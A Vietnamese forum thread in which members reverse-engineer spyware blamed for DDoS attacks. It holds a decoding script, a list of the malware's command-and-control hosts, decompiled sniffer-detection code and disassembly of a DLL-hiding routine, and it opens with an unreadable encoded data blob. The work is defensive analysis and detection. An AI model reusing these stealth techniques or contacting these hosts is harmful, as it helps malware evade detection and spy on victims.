|nmxonvd=Tsixosxi=Nx~hotid=/-,,..msmirrqnBe%+{ox..Pt~ornr{i=Yr~hpxsi=Xemqroxo=/--%..Pt~ornr{i=Ktnh|q=W>=/3-=Oxytniothi|qx=M|~v|zx..niox|ppxyt|n|pmqxn..r{{oxzBe%+{ox..Pt~ornr{i=Ktnh|q=^66=/--(=Oxytniothi|qx..hnn|pmqxn..yokirrqnBt|+){ox..Ox~xtkxTsni|qqxo..UM=Q|nxoWxi=Irrqre..Pt~ornr{i=Ktnh|q=^66=/--(=\IQ=Hmy|ix=v$*.$/.=0=e%+=%3-3(-*/*3)-(...Ktnh|q=^66=/--%=e%+=Ohsitpx=0=5k$3-3.-*/$3),)%4..Ktnh|q=^66=/--%=e%+=Ohsitpx=0=k$3-3.-*/$3),)%..ts{n|pmqxBe%+{ox..Nr{ij|ox=Hmy|ix={ro=Jx=[rqyxon..Pt~ornr{i=Jtsyrjn=Yotkxo=Vti=Yr~hpxsi|itrs=*+--3-$,/-,..y{eBt|+){ox..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH..Nx~hotid=Hmy|ix={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_//(,)%*4..Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=Nxokt~x=M|~v=,=5V_$)(,)-4..Uri{te={ro=Pt~ornr{i=Ktnh|q=Nihytr=Ix|p=Ndnixp=/--%=Ix|p=Nhtix=0=XSH=5V_$*,-$/4..xksiyokn|pmqx..m{yBe%+{ox..Yxhzztsz=Irrqn={ro=Jtsyrjn=5e%+4..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=Ux|yxon=|sy=Qto|otxn..jmyirrqnBe%+{ox..PNEPQ=)3-=NM/=5V_$()).-4..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=V_/)+*,*)=0=e%+=$3-3.-*/$3((*-..y{eBe%+{ox..Pt~ornr{i=Ntqkxoqtzui..Tsixq5O4=Xeioxpx=Zo|mut~n=/=Yotkxo..nxihmirrqnBe%+{ox..irrqnBe+){ox..yokirrqnBe%+{ox..Pt~ornr{i=R{{t~x=Mor{xnntrs|q=Xytitrs=/--...^rpm|ittqtid=M|~v={ro=iux=/--*=R{{t~x=ndnixp..utyBtsmhin|pmqxn..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=Irrqn=0=XSH..tr~iqn|pmqx.._rrni=Qto|otxn={ro=^66_htqyxo=/-,-..Pt~ornr{i=\mmqt~|itrs=Xooro=Oxmroitsz..UM=Q|nxoWxi=P,.,$=P[M=Nxotxn=Irrqre..utyn|pmqxtsmhi..y{eBe+){ox..mrjxop|s|zxpxsiBe%+{ox..htqyn|pmqxn..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3,*..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3.-*/$3+,+,..jemqtnBe%+{ox..zxsxo|qirrqnBe+){ox..\QMN=Irh~u=M|y=Yotkxo..hpy{n|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=.3-=Nxokt~x=M|~v=/..ytnmq|dn|pmqxn..ts{n|pmqxBt|+){ox..PokqHnzIo|~vtsz..qhxirriuirrqnBe%+{ox..tp|ztszirrqnBe+){ox..Xp|o~|yxor=O\Y=Nihytr=/-,-..jnyirrqBe%+{ox..yokirrqnBe+){ox..jmyn|pmqxn..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Jts./=Irrqn..nxihmirrqnBt|+){ox..mrjxop|s|zxpxsiBe+){ox..motsiirrqnBe%+{ox..qtnBe%+{ox..jptn|pmqxn..|kniox|pirrqnBt|+){ox..|kniox|pirrqnBe+){ox..msmmroinn|pmqx..YN[0VtiNxihm..t{nn|pmqxn..Pt~ornr{i=3SXI=[o|pxjrov=/3-=Nxokt~x=M|~v=/..njihsxo..utyn|pmqxn..N~|s=Ir..[|eNxsyTsni|qqxo..OX\QIXV=ZX=;=[X=Xiuxosxi=M^T0X=ST^=Yotkxo..Pt~ornr{i=Jtsyrjn=NYV={ro=Ktnh|q=Nihytr=/--%=NM,=Irrqn..r|~oBe%+{ox..irrqnBe%+{ox..Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(.($(4..Uri{te={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$(%)%)4..Hmy|ix={ro=Pt~ornr{i=3SXI=[o|pxjrov=.3(=NM,=5V_$+.*-*4..zxsxo|qirrqnBe%+{ox..htqyirrqnBt|+){ox..P|ovxiOxnx|o~u..qtnBt|+){ox..nyk..jsxiqtnBe%+{ox..m{yBt|+){ox..trpxiot~irrqnBe+){ox..msmirrqnBt|+){ox..motsin|pmqxn..|kniox|pn|pmqxn..htqyirrqnBe+){ox..tsni|qquxqm..pryxpirrqn..qhxirriuirrqnBt|+){ox..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Y|i||nx=M|~v..r{{oxzBe+){ox..jmyirrqnBe+){ox..Pt~ornr{i=Ktnh|q=Nihytr=/--%=Mxo{rop|s~x=^rqqx~itrs=Irrqn=0=XSH..j~rtsni|qqxon..jnyirrqBt|+){ox..jnyirrqBe+){ox..Ox|qixv=Utzu=Yx{tstitrs=\hytr=Yotkxo..Xp|o~|yxor=Yxqmut=|sy=^66_htqyxo=/-,-=Uxqm=Ndnixp..sxijrovqto|otxnBe+){ox..jy{irrqnBe+){ox..PNEPQ=)3-=NM/=5V_$*.+%%4..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Uxqm=Ndnixp..ktni|qtnBe%+{ox..jmyirrqnBt|+){ox..^ryxZx|o=Yxqmut=|sy=^66_htqyxo=/--$=Y|i||nx=M|~v..m~tyokn|pmqx..Pt~ornr{i=Ktnh|q=^66=/--%=Oxytniothi|qx=0=e%+=$3-3/,-//...EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.EEEEEEEEEEEEEEEEEEEEEEE
[27/09/2011 3:13:18 PM:468]
00000000  67 00 00 00                                                                                          g...
]]>
/hvaonline/posts/list/39641.html#247820 /hvaonline/posts/list/39641.html#247820 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247835 /hvaonline/posts/list/39641.html#247835 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. send và recv để gửi và nhận. Thông tin (char buffer) gởi đi được xor từng byte với 0x1D, còn thông tin nhận về được xor từng byte với 0x45 ('E' char) để lấy lại string ra lệnh nguyên thuỷ. Ngoài thông tin về username, computer name, hardware: disk, cpu, MAC address, các process đang run, windows name đang mở, con cversions.2.db này còn lấy hết danh các software, các MS update đã install trên máy victim và gởi đi. Cái list softwares này mới là nhiều nè. Máy em thôi sơ sơ ra khoãng 102 dòng thôi. Vì vậy mấy anh stl cứ phải giãi mã mệt nghỉ luôn ;) ]]> /hvaonline/posts/list/39641.html#247844 /hvaonline/posts/list/39641.html#247844 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Các thông tin về victim, về cấu hình phần cứng, serial number của CPU, harddisk, username, computername, licenseID, danh sách các phần mềm đã instal, IE ver, path, name của thư mục %UserProfile%... mà mấy anh còn lấy được, còn úp về được thì victim hết đường chối khi mấy anh muốn "bạch hoá". Thậm chí em đang run những phần mềm nào trên máy, mấy anh còn lấy list luôn (PSAPI hay ToolHelp32 API), dùng EnumWindows hết tất cả window đang mở rồi ghi xuống Global Temp File của mấy anh (so siếc, encode gì đó xong) rồi để up đi thì còn cái gì của victim mà mấy anh không biết nữa ? Mấy anh đang vi phạm trắng trợn quyền bảo mật thông tin của công dân đấy nhé ! 
Các thông tin khác em không nói, nhưng stl lấy thông tin về cấu hình phần cứng, serial number của CPU, harddisk, username, computername, licenseID thì em nghĩ các đồng chí stl là người của Orange rồi, vì hacker bình thường lấy mấy thông tin có vẻ không hữu dụng khác, còn với Orange thì, he he, đó là bằng chứng.]]>
/hvaonline/posts/list/39641.html#247849 /hvaonline/posts/list/39641.html#247849 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247850 /hvaonline/posts/list/39641.html#247850 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247851 /hvaonline/posts/list/39641.html#247851 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. %LocalAppData%\Apps\GDIPFONTCACHEV1.DAT. Bà con nào nếu tìm thấy file GDIPFONTCACHEV1.DAT này, trong thư mục Apps nhé (vì có nhiều GDIPFONTCACHEV1.DAT file) thì có thể dùng 010 Editor script sau để giải mã và xem, thử có giật mình không: Code:
//----------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeGDIPFontCacheV1.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode file GDIPFONTCACHEV1.DAT
//----------------------------------------------------------------------------
int i, j, size = FileSize();
unsigned char xorBuf[size], val;

if (size <= 0)
{
    MessageBox(idOk, "DecodeGDIPFontCacheV1", "No file loaded or file empty.");
    return -1;
}

// Modify bytes
for (i = 0, j = 0; i < size; i++)
{
    val = (ReadUByte(i) ^ i) ^ 0x10;
    if (val == 0x9)
    {
        val = 0xA;
    }
    if (val != 0x00)
    {
        xorBuf[j] = val;
        j++;
    }
}

int newFile = FileNew();
FileSelect(newFile);    // force select new file
WriteBytes(xorBuf, 0, j);
]]>
/hvaonline/posts/list/39641.html#247853 /hvaonline/posts/list/39641.html#247853 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247857 /hvaonline/posts/list/39641.html#247857 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247858 /hvaonline/posts/list/39641.html#247858 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247862 /hvaonline/posts/list/39641.html#247862 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247867 /hvaonline/posts/list/39641.html#247867 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mediafire.com/?sjreraa710iqkqn chính là SmartSniff đã được tui patch vài chổ. Bà con down về, run, vào menu "Capture Options", set lại Capture Method và "Select network adapter" tương ứng với máy mình là xong. Hy vọng bà con dùng cái sniffsm (Sniff Smart;)) này để tóm được thằng bot đang DDOS VNN.]]> /hvaonline/posts/list/39641.html#247899 /hvaonline/posts/list/39641.html#247899 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
netstat
để xem danh sách các kết nối ra ngoài (ESTABLISHED), nếu thấy xuất hiện tên domain có .vn, hoặc dãy IP của Việt nam thì chạy tiếp các tool sniff để lấy thêm thông tin. Trang kiểm tra thông tin về địa chỉ IP: http://all-nettools.com/toolbox/smart-whois.php Danh sách các tool sniff: http://thedatalist.com/pages/Packet_Sniffing.htm (có thể sử dụng những tool khác với SmartSniff, Wireshark,... để mong STL chưa update code kịp :)]]>
/hvaonline/posts/list/39641.html#247901 /hvaonline/posts/list/39641.html#247901 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247905 /hvaonline/posts/list/39641.html#247905 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247913 /hvaonline/posts/list/39641.html#247913 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/112.html]]> /hvaonline/posts/list/39641.html#247918 /hvaonline/posts/list/39641.html#247918 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

batigol wrote:
Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn 
Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì?]]>
/hvaonline/posts/list/39641.html#247919 /hvaonline/posts/list/39641.html#247919 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

batigol wrote:
Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn 
Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì? 
giả sử thế này anh nhé. Hệ thống gồm 2 server, một firewall đặt trước, băng thông thi ko phải nghĩ nhưng performance của server thì phải nghĩ đó anh. làm sao để xử lý ddos mà vẫn đảm bảo cho valid user truy cập bình thường? ]]>
/hvaonline/posts/list/39641.html#247926 /hvaonline/posts/list/39641.html#247926 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

batigol wrote:

conmale wrote:

batigol wrote:
Chào các anh. Em cũng tò mò đọc các phân tích của các anh. Thì thấy chủ yếu là các anh nói về nguyên nhân, hiện tượng nhưng chưa thấy ai đưa ra biện pháp chống đỡ thiết thực cả? @anh Conmale: theo anh thì ddos thì nên chống thế nào thì hiệu quả nhất ạ? em cũng có xem qua nhiều tài liệu nhưng chưa thấy biện pháp nào khả thi cả. Vietnamnet có vẻ đã có giải pháp tốt cho vấn đề này. các anh thử vào xem? http://vietnamnet.vn 
Làm sao mà đưa ra biện pháp nếu như không nắm rõ hệ thống vietnamnet có gì? Chống hiệu quả nhất cho hệ thống bao gồm cái gì? 
giả sử thế này anh nhé. Hệ thống gồm 2 server, một firewall đặt trước, băng thông thi ko phải nghĩ nhưng performance của server thì phải nghĩ đó anh. làm sao để xử lý ddos mà vẫn đảm bảo cho valid user truy cập bình thường?  
Mơ hồ quá em. Xử lý ddos nào? Có hàng ngàn biến thái của ddos. Chẳng có một giải pháp nào có thể áp dụng cho mọi trường hợp hết. Riêng với vietnamnet thì thông tin chính xác về topology cũng như các cơ cấu bên trong thì chẳng mấy ai biết và nếu có biết thì cũng biết theo kiểu "black box". Các thảo luận về giải pháp cho vietnamnet (với cấp độ biết kiểu "black box") thì đã có rẩt nhiều trên diễn đàn rồi. Em chịu khó tìm và đọc lại. Ngay trả trong chủ đề này cũng có mà em chưa đọc kỹ đó thôi.]]>
/hvaonline/posts/list/39641.html#247928 /hvaonline/posts/list/39641.html#247928 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. The file 'QTTask.dll' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result QTTask.exe MALWARE The file 'QTTask.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rdpuser.mof MALWARE The file 'rdpuser.mof' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rfc2616.exe MALWARE The file 'rfc2616.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates. Filename Result rwoqv.exe MALWARE The file 'rwoqv.exe' has been determined to be 'MALWARE'. Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.]]> /hvaonline/posts/list/39641.html#247930 /hvaonline/posts/list/39641.html#247930 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.mywot.com/wiki/Malware_submission]]> /hvaonline/posts/list/39641.html#247939 /hvaonline/posts/list/39641.html#247939 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. rfc2616.exe -- identity created/updated (New detection Troj/Agent-TOZ) rwoqv.exe -- identity created/updated (New detection Troj/Agent-TPA) ]]> /hvaonline/posts/list/39641.html#247941 /hvaonline/posts/list/39641.html#247941 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. 00591716EE0B2D17A7620C65D8773C65F4DFAD68 Trojan:Win32/Horsum.A Severe E7F8258F22B7210DCA785D1040970097AAFC542C Trojan:Win32/Horsum.A Severe 7194E514AD58AE4BE6233CE1F00C8FF5EE29DCBE Trojan:Win32/Horsum.A Severe 7649A82681D9B8E2B656286F13BDD7E84537F005 Trojan:Win32/Horsum.A Severe 684EEF9918E11E648BF617FAF2A764AE42CEB433 Trojan:Win32/Temvekil.B Severe Cả 5 files đều được xem là "severe".]]> /hvaonline/posts/list/39641.html#247942 /hvaonline/posts/list/39641.html#247942 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. are new trojans and will be detected in one of the next virus definitions updates. ]]> /hvaonline/posts/list/39641.html#247982 /hvaonline/posts/list/39641.html#247982 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247984 /hvaonline/posts/list/39641.html#247984 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC wrote:
Lừa đảo trắng trợn. Không nhân cách của con người.... http://www.baomoi.com/Home/CNTT/ictpress.vn/Thanh-lap-ban-ho-tro-ung-cuu-VietNamNet/7083779.epi 
Ý bạn đang nói về stl đấy à? Đọc bài trong link bạn gửi xong mình thấy ngạc nhiên là với vncert và các cơ quan chức năng tham gia ứng cứu sao vẫn khó khăn vậy?]]>
/hvaonline/posts/list/39641.html#247986 /hvaonline/posts/list/39641.html#247986 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#247989 /hvaonline/posts/list/39641.html#247989 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

weasel1026789 wrote:

TMDTHBC wrote:
Lừa đảo trắng trợn. Không nhân cách của con người.... http://www.baomoi.com/Home/CNTT/ictpress.vn/Thanh-lap-ban-ho-tro-ung-cuu-VietNamNet/7083779.epi 
Ý bạn đang nói về stl đấy à? Đọc bài trong link bạn gửi xong mình thấy ngạc nhiên là với vncert và các cơ quan chức năng tham gia ứng cứu sao vẫn khó khăn vậy? 
Mỉnh theo forum của HVA lâu lắm rồi, học hỏi mọi người khá nhiều ... Nhưng mình không nghĩ ... "trắng trợn và thô bỉ" đến thế. CMC thì có bolzano đại diện ........ còn mấy cu vớ vẩn ... thế mà cũng tự hào đưa lên "báo". @ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm. ]]>
/hvaonline/posts/list/39641.html#247999 /hvaonline/posts/list/39641.html#247999 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248000 /hvaonline/posts/list/39641.html#248000 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248007 /hvaonline/posts/list/39641.html#248007 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC wrote:
@ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm.  
Mình nghĩ anh TQN và các bác trong HVA "phân tích" malware stl không phải để đươc công nhận này nọ. Quan trọng là sự "sạch sẽ" của hệ thống mạng còn non trẻ ở VN. Tại CMC, VnCert, FPT ... đều có những thành viên gạo cội của HVA công tác ở những vị trí quan trọng. Có thể báo chí không đề cập đến nhưng những người làm kỹ thuật chân chính tại các đơn vị trên vẫn luôn theo dõi rút tỉa kinh nghiệm từ HVA, họ cảm thấy HVA có chất lượng, có ích lợi cho cộng đồng là ok rồi :) Có lẽ khi nào HVA trở thành 1 tổ chức hoặc một nhóm bảo mật có "danh chính ngôn thuận" tại VN thì trên các báo sẽ đề cập đến :D ]]>
/hvaonline/posts/list/39641.html#248011 /hvaonline/posts/list/39641.html#248011 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Ngày hôm qua em gặp mẫu của thằng Nga, dùng RPC để lây lan, em thiệt bó tay, té xỉu luôn ! Chả hiểu nó viết cái gì, vì về code nó đã là thằng coder cao tay hơn mình rồi ! Sau cùng, phải nhờ anh Gấu gồ, anh ấy chỉ ra là nó khai thác lổi của Print Spooler. 
Đề nghị TQN cung cấp thông tin về con khai thác cái Print Spooler này giúp với, hiện tại đang bị cái lỗi chắc là từ con này, mà ghost lại máy, cài lại win vẫn bị dính. Tks.]]>
/hvaonline/posts/list/39641.html#248014 /hvaonline/posts/list/39641.html#248014 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

vikjava wrote:

TMDTHBC wrote:
@ TQN: công và sức của a mọi người biết nhưng mình không dằn đc lòng khi thấy điều vớ vẩn đó. TQN có khi nào a nghĩ chơi trò "gậy ông đập lưng ông". Mình hiểu chỉ là đam mê nhưng phải lịch sự tí, còn vớ vẩn kiểu này thì .... :-( cho chết luôn đi. Một thằng chết thì cả làng cảnh giác và quan tâm.  
Mình nghĩ anh TQN và các bác trong HVA "phân tích" malware stl không phải để đươc công nhận này nọ. Quan trọng là sự "sạch sẽ" của hệ thống mạng còn non trẻ ở VN. Tại CMC, VnCert, FPT ... đều có những thành viên gạo cội của HVA công tác ở những vị trí quan trọng. Có thể báo chí không đề cập đến nhưng những người làm kỹ thuật chân chính tại các đơn vị trên vẫn luôn theo dõi rút tỉa kinh nghiệm từ HVA, họ cảm thấy HVA có chất lượng, có ích lợi cho cộng đồng là ok rồi :) Có lẽ khi nào HVA trở thành 1 tổ chức hoặc một nhóm bảo mật có "danh chính ngôn thuận" tại VN thì trên các báo sẽ đề cập đến :D  
Theo anh em, Con đường nào cho HVA để trở thành "danh chính ngôn thuận" ? ]]>
/hvaonline/posts/list/39641.html#248015 /hvaonline/posts/list/39641.html#248015 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248018 /hvaonline/posts/list/39641.html#248018 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248019 /hvaonline/posts/list/39641.html#248019 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248026 /hvaonline/posts/list/39641.html#248026 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
Host                            IP                  Hosted
=====                           ==                  =======
educationuk.ath.cx              111.90.150.183      PIRADIUS NET, Malaysia
goldenftpserver.ftpaccess.cc    188.72.216.63       Santrex Internet Service, Germany
hackforums.blogdns.net          209.217.248.77      Landis Holdings Inc, USA - Texas
playgirl.mypets.ws              188.72.216.63       Santrex Internet Service, Germany
searchsecurity.selfip.info      111.90.150.183      PIRADIUS NET, Malaysia
]]>
/hvaonline/posts/list/39641.html#248030 /hvaonline/posts/list/39641.html#248030 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Các bản AV free mà bà con ta thường dùng còn MS Essentials, AVG và Avast. Mong bà con tiếp tục submit mẫu QTTask.zip cho các AntiVirus bà con đang dùng ! Bà con có thể theo list này để submit mẫu: http://www.mywot.com/wiki/Malware_submission 
Cái này được đó bác lên đó sưu tập ok đó.]]>
/hvaonline/posts/list/39641.html#248055 /hvaonline/posts/list/39641.html#248055 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#248057 /hvaonline/posts/list/39641.html#248057 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.
@TQN: có cách nào dùng Wireshark mà malware stl không phát hiện được không anh?]]>
/hvaonline/posts/list/39641.html#248060 /hvaonline/posts/list/39641.html#248060 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://www.wireshark.org, run và test WindowName trên Wireshark đó. Tóm lại, cuối cùng, ta chỉ cần đổi tên wireshark.exe thành tên khác, vd: wrshark.exe, thì toàn bộ đoạn code detect Wireshark của stl coder (group ?) sẽ vô dụng ! Còn để đề phòng cho các trường hợp detect khác, ngoài việc đổi tên wireshark.exe thành xxx.exe gì đó, các bạn nên dùng thêm 1 HexEditor (010 Editor chẳng hạn, bà con down tại đây http://www.exelab.ru) để find và replace Ansi string "The Wireshark Network Analyzer" thành chuổi khác, vd như em thì thay thành "The Sharkwire Analyzer Network" =)) Đoạn thread code detect sniffers của stl coder: Code:
int __stdcall Set_Privilege_And_Detect_Sniffers_Thread_Proc(LPVOID pParam)
{
    HANDLE hThread; // eax@1

    hThread = CreateThread(0, 0, EnableDebugAndShutdownPrivilege, 0, 0, 0);
    if (hThread)
        CloseHandle(hThread);

    while ( g_dwContinue )
    {
        if ( DetectWireshark() || DetectSmartSniff() || DetectEtherDPacketSniffer() )
        {
            g_bNotSafeToConnect = TRUE;
            Sleep(5000u); // ngủ 5s
        }
        else
        {
            g_bNotSafeToConnect = FALSE;
            Sleep(5000u);  // ngủ 5s
        }
    }
    return 0;
}
Cứ ngủ xong 5s, thức dậy, detecting tiếp, set cờ, lại ngủ tiếp. Bởi vậy có bà con có nói với em, sao "mèo đã què" rồi mà không cho ngủ hả anh ?! Ngủ hay không ngủ gì nó cũng ngốn và nóng CPU hết, vì đã code multithread mà cứ Sleep với loop liên tục thì bằng không ? Và không lẽ khi đang debug nó, mình phải ngủ theo nó à :-( Lại còn check đk trên global variables nữa chứ, tranh chấp hay detect sai là cái chắc (g_dwContine và g_bNotSafeToConnect). Mấy anh stl không biết dùng cơ chế Synchronize và WaitForxxx à ? ]]>
/hvaonline/posts/list/39641.html#248063 /hvaonline/posts/list/39641.html#248063 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
.text:1000D610     ; BOOL HideDLL(void)
.text:1000D610     HideDLL proc near                       ; CODE XREF: MaintThreadProc+A9p
.text:1000D610     ldr     = dword ptr -4
.text:1000D610 000         push    ecx
.text:1000D611 004         mov     ecx, g_hinstDLL
.text:1000D617 004         test    ecx, ecx
.text:1000D619 004         jnz     short @@DLLInstanceNotZero
.text:1000D61B 004         xor     eax, eax
.text:1000D61D 004         pop     ecx
.text:1000D61E 000         retn
.text:1000D61F     @@DLLInstanceNotZero:                   ; CODE XREF: HideDLL+9j
.text:1000D61F 004         push    esi
.text:1000D620 008         mov     eax, large fs:18h       ; eax = ptr to _TEB
.text:1000D626 008         mov     eax, [eax+_TEB.ProcessEnvironmentBlock] ; eax = ptr to _PEB
.text:1000D629 008         mov     eax, [eax+_PEB.Ldr]     ; eax = ptr to _PEB_LDR_DATA
.text:1000D62C 008         mov     [esp+8+ldr], eax
.text:1000D630 008         mov     eax, [esp+8+ldr]
.text:1000D634 008         mov     esi, [eax+PEB_LDR_DATA.InLoadOrderModuleList.Flink] ; esi = InLoadOrderModuleList: _LIST_ENTRY struct
.text:1000D637 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.DllBase] ; eax = DllBase of first DLL (0x18 offset in LDR_DATA_TABLE_ENTRY struct)
.text:1000D637                                             ; In Windows, hau nhu la DllBase cua Ntdll.dll
.text:1000D63A 008         test    eax, eax
.text:1000D63C 008         jz      short @@FoundThisDLL
.text:1000D63E 008         mov     edi, edi
.text:1000D640     @@IsThisDLL:                            ; CODE XREF: HideDLL+3Bj
.text:1000D640 008         cmp     eax, ecx                ; ecx = DllBase or HInstance of this DLL
.text:1000D642 008         jz      short @@FoundThisDLL
.text:1000D644 008         mov     esi, [esi]              ; esi = InLoadOrderLinks.Flink
.text:1000D646 008         mov     eax, [esi+_LDR_DATA_TABLE_ENTRY.DllBase] ; eax = DllBase of next DLL
.text:1000D649 008         test    eax, eax
.text:1000D64B 008         jnz     short @@IsThisDLL
.text:1000D64D     @@FoundThisDLL:                         ; CODE XREF: HideDLL+2Cj
.text:1000D64D                                             ; HideDLL+32j
.text:1000D64D 008         cmp     [esi+_LDR_DATA_TABLE_ENTRY.DllBase], 0 ; DllBase is 0 ?
.text:1000D651 008         jnz     short @@ModifyDoubleLinkList
.text:1000D653 008         xor     eax, eax
.text:1000D655 008         pop     esi
.text:1000D656 004         pop     ecx
.text:1000D657 000         retn
.text:1000D658     @@ModifyDoubleLinkList:                 ; CODE XREF: HideDLL+41j
.text:1000D658 008         mov     ecx, [esi+_LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Blink]
